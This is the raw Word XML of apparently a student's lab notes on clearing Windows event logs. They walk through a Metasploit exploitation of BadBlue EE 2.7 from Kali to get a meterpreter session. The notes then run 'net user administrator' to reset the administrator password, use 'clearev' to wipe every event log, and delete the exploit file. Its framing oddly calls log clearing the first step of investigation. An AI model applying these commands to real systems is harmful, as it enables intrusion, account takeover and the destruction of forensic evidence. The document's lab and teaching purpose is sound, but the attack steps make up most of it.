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B20207" w14:textId="47410B1D" w:rsidR="00853ABF" w:rsidRPr="006778E1" w:rsidRDefault="001B64AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006778E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clearing Windows Event Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="006778E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E9E00" w14:textId="77777777" w:rsidR="001B64AC" w:rsidRDefault="001B64AC"/>
    <w:p w14:paraId="33F045DE" w14:textId="384F12EC" w:rsidR="001B64AC" w:rsidRDefault="00C4013A">
      <w:r>
        <w:t>It is extremely</w:t>
      </w:r>
      <w:r w:rsidR="001B64AC">
        <w:t xml:space="preserve"> important</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to clear logs; it’s the first step to investigating the attack</w:t>
      </w:r>
      <w:r w:rsidR="001B64AC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE59D9B" w14:textId="77777777" w:rsidR="001B64AC" w:rsidRDefault="001B64AC"/>
    <w:p w14:paraId="6194887E" w14:textId="77777777" w:rsidR="001B64AC" w:rsidRPr="001B64AC" w:rsidRDefault="001B64AC" w:rsidP="001B64AC">
      <w:r w:rsidRPr="001B64AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Event Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> are records of activities on a computer.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:br/>
        <w:t>They are divided into three main types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A454316" w14:textId="116C2420" w:rsidR="001B64AC" w:rsidRPr="001B64AC" w:rsidRDefault="001B64AC" w:rsidP="001B64AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B64AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> Events from programs (</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r>
        <w:t>Startup,</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> app errors or crashes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B5963" w14:textId="47D845FA" w:rsidR="001B64AC" w:rsidRPr="001B64AC" w:rsidRDefault="001B64AC" w:rsidP="001B64AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B64AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> Events from Windows system components (e.g. </w:t>
      </w:r>
      <w:r>
        <w:t>Startup,</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00390C93" w:rsidRPr="001B64AC">
        <w:t>driver</w:t>
      </w:r>
      <w:r w:rsidR="00390C93">
        <w:t>, reboot</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> or service issues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011263A" w14:textId="77777777" w:rsidR="001B64AC" w:rsidRPr="001B64AC" w:rsidRDefault="001B64AC" w:rsidP="001B64AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B64AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B64AC">
        <w:t xml:space="preserve"> Records of logins, logouts, and access attempts for security tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115BCC5" w14:textId="77777777" w:rsidR="001B64AC" w:rsidRDefault="001B64AC"/>
    <w:p w14:paraId="32483E13" w14:textId="1F447C19" w:rsidR="001B64AC" w:rsidRDefault="00C4013A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Event logs are accessed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4013A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event viewers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B831608" w14:textId="70307051" w:rsidR="00C4013A" w:rsidRDefault="00C4013A"/>
    <w:p w14:paraId="040246FA" w14:textId="4AE578D1" w:rsidR="00C4013A" w:rsidRPr="00C4013A" w:rsidRDefault="00C4013A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4013A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A1837" w14:textId="77777777" w:rsidR="00C4013A" w:rsidRDefault="00C4013A"/>
    <w:p w14:paraId="1E8B0C16" w14:textId="25FDC22D" w:rsidR="00C4013A" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405CF70" w14:textId="3A3658B7" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76E4D2" w14:textId="3B14EC4A" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ABF3FE5" w14:textId="5D58BD0E" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C8E18ED" w14:textId="796AFD73" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862EFCB" w14:textId="30320D27" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32504E2F" w14:textId="1071A155" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590AD1AD" w14:textId="01A135F3" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BadBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\ EE\ 2.7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>\  Universal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E6D137E" w14:textId="37568E5A" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F993A9" w14:textId="69D2AE05" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AE92A" w14:textId="77777777" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0"/>
    <w:p w14:paraId="45A33744" w14:textId="3C58C665" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="444F16B0" w14:textId="51BE7C49" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DD47B40" w14:textId="4C24EFB1" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve"># we must have elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prives</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to clear the logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF62A8E" w14:textId="77777777" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0"/>
    <w:p w14:paraId="2E87573B" w14:textId="5361ED34" w:rsidR="00D30CD0" w:rsidRPr="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30CD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On the windows system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889245C" w14:textId="77777777" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0"/>
    <w:p w14:paraId="4212D23E" w14:textId="6EC42BC3" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Open the event viewer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A6C65" w14:textId="77777777" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0"/>
    <w:p w14:paraId="1892707E" w14:textId="1C5F3CA1" w:rsidR="00C4013A" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Go to windows logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFA3D7" w14:textId="38C229EF" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">We see </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625EEA7" w14:textId="468E8B81" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:r>
        <w:t>logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317CC44" w14:textId="2BC613B9" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t xml:space="preserve">System </w:t>
      </w:r>
      <w:r>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23596F72" w14:textId="14A89584" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0">
      <w:r>
        <w:t>Security logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCD0A2" w14:textId="23EE3260" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t># it does not show any malicious thing as we don’t do till now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C50E3" w14:textId="77777777" w:rsidR="00D30CD0" w:rsidRDefault="00D30CD0"/>
    <w:p w14:paraId="76508B4C" w14:textId="1D8F983E" w:rsidR="007B178E" w:rsidRPr="007B178E" w:rsidRDefault="007B178E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now on kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC500DB" w14:textId="5CC4E496" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="04F75F28" w14:textId="3BBCE8CB" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C8C59" w14:textId="0642E355" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve">Net user </w:t>
      </w:r>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>password_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418BB0F" w14:textId="4B630884" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve"># changing the password of </w:t>
      </w:r>
      <w:r>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to password_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857B300" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="659462E4" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="61DEB598" w14:textId="5655FBAE" w:rsidR="007B178E" w:rsidRPr="007B178E" w:rsidRDefault="007B178E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now on windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D598C81" w14:textId="5126097A" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t>It is logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7540F0A0" w14:textId="6441F377" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t>View it in the security logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144DB4A" w14:textId="1BB794C4" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t># as forensics investigator this info is very important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAFBFCF" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="56DA235C" w14:textId="77777777" w:rsidR="007B178E" w:rsidRPr="007B178E" w:rsidRDefault="007B178E" w:rsidP="007B178E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now on kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88629F" w14:textId="5363655D" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clear</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the event logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26171DDB" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="34210BFA" w14:textId="43C94E1F" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>come</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session and then,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8202CF" w14:textId="01E240D0" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="425899F6" w14:textId="25A31BA5" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clear</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3EC49" w14:textId="3797D1E4" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="1C426D9D" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="2293A82F" w14:textId="77777777" w:rsidR="007B178E" w:rsidRPr="007B178E" w:rsidRDefault="007B178E" w:rsidP="007B178E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now on windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE2289" w14:textId="75FF094D" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve">Open the event viewer all the logs are clear </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA5FAE" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="5020B8BC" w14:textId="34CB890C" w:rsidR="007B178E" w:rsidRPr="007B178E" w:rsidRDefault="007B178E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B178E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DC52F" w14:textId="2242300B" w:rsidR="007B178E" w:rsidRDefault="007B178E">
      <w:r>
        <w:t xml:space="preserve">You must have administrative </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Todo that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFB3B1" w14:textId="77777777" w:rsidR="007B178E" w:rsidRDefault="007B178E"/>
    <w:p w14:paraId="5887F051" w14:textId="6AEEC596" w:rsidR="00767DFC" w:rsidRDefault="00767DFC">
      <w:r>
        <w:t xml:space="preserve">To delete the exploit on the target system we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="009E4F59">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009E4F59">
        <w:t xml:space="preserve"> do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this with </w:t>
      </w:r>
      <w:r w:rsidR="009E4F59">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> help of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> write command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E30F5" w14:textId="4207203B" w:rsidR="00767DFC" w:rsidRPr="00C4013A" w:rsidRDefault="00767DFC" w:rsidP="00767DFC">
      <w:r>
        <w:t>rm exploit.exe</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00767DFC" w:rsidRPr="00C401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762FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82208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60921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0017"/>
    <w:rsid w:val="00040017"/>
    <w:rsid w:val="001B64AC"/>
    <w:rsid w:val="00360658"/>
    <w:rsid w:val="00390C93"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006778E1"/>
    <w:rsid w:val="00767DFC"/>
    <w:rsid w:val="007B178E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009E4F59"/>
    <w:rsid w:val="00C4013A"/>
    <w:rsid w:val="00D30C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FC9367"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50534D1A-079B-4926-9258-8F61B94DCD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00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00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00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00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00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00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00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00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00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00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00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00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001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001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00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00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00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00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00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00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00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00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00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00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00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001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00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001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001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216</Words>
  <Characters>1351</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>112</Lines>
  <Paragraphs>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umar farooq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>umar farooq</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T04:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T04:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>